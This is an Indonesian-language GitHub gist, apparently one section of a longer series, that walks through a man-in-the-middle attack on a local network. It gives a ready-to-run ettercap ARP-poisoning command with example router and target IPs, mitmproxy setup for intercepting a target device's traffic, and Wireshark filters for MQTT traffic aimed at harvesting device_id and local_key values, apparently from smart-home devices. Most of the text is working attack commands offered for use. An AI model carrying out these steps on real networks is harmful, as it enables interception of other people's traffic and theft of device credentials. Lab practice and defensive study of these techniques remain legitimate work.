Skip to content

Instantly share code, notes, and snippets.

@z0rs
Created July 17, 2024 14:04
Show Gist options
  • Save z0rs/26094734c446b27bf4e06446c38258a7 to your computer and use it in GitHub Desktop.
Save z0rs/26094734c446b27bf4e06446c38258a7 to your computer and use it in GitHub Desktop.

3. Man-in-the-Middle (MITM) Attack

Tools: ettercap, mitmproxy, Wireshark

Langkah-langkah:

A. ARP Spoofing dengan Ettercap

  1. Install Ettercap:

    sudo apt-get install ettercap-graphical
  2. Jalankan Ettercap:

    • Buka Ettercap dalam mode teks:
      sudo ettercap -T -q -i <interface> -M ARP /<IP Router>/ /<IP Target>/
    • Ganti <interface> dengan interface jaringan kamu, <IP Router> dengan IP router, dan <IP Target> dengan IP perangkat target.

B. Menggunakan mitmproxy untuk Sniff Traffic

  1. Install mitmproxy:

    sudo apt-get install mitmproxy
  2. Jalankan mitmproxy:

    mitmproxy -p 8080
  3. Konfigurasi Proxy pada Perangkat Target:

    • Setel perangkat target untuk menggunakan proxy yang mengarah ke IP address komputer kamu dengan port 8080.
  4. Sniff dan Capture Traffic:

    • Gunakan mitmproxy untuk melihat dan mengcapture traffic.
    • Kamu bisa menggunakan interface web mitmproxy di browser: http://localhost:8081.

C. Menggunakan Wireshark untuk Analisis Traffic

  1. Capture Traffic dengan Wireshark:

    • Buka Wireshark dan pilih interface jaringan WiFi kamu.
    • Klik tombol Start untuk mulai capture.
  2. Filter Traffic:

    • Gunakan filter seperti ip.addr == <IP Perangkat> atau tcp.port == 1883 untuk MQTT traffic.
    • Cari data seperti device_id, local_key, dan IP Address.

Contoh ARP Spoofing dengan Ettercap

sudo ettercap -T -q -i wlan0 -M ARP /192.168.1.1/ /192.168.1.100/
  • -T untuk mode teks.
  • -q untuk mode diam (quiet mode).
  • -i wlan0 untuk interface jaringan yang digunakan (sesuaikan dengan interface yang kamu gunakan).
  • -M ARP untuk mode ARP poisoning.
  • /192.168.1.1/ untuk IP router.
  • /192.168.1.100/ untuk IP perangkat target.

Contoh Konfigurasi mitmproxy

  1. Menjalankan mitmproxy:

    mitmproxy -p 8080
  2. Set Proxy di Perangkat Target:

    • Set proxy di perangkat target ke IP_komputer_kamu:8080.
  3. Analisis Traffic:

    • Buka browser dan akses http://localhost:8081 untuk melihat traffic yang lewat mitmproxy.

Contoh Filter Traffic di Wireshark

  1. Buka Wireshark:

    • Pilih interface jaringan dan klik Start.
  2. Gunakan Filter:

    • Untuk memfilter traffic dari perangkat tertentu:
      ip.addr == 192.168.1.100
    • Untuk memfilter traffic ke port MQTT (1883):
      tcp.port == 1883
  3. Analisis Paket:

    • Cari data penting seperti device_id, local_key, dan IP Address.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment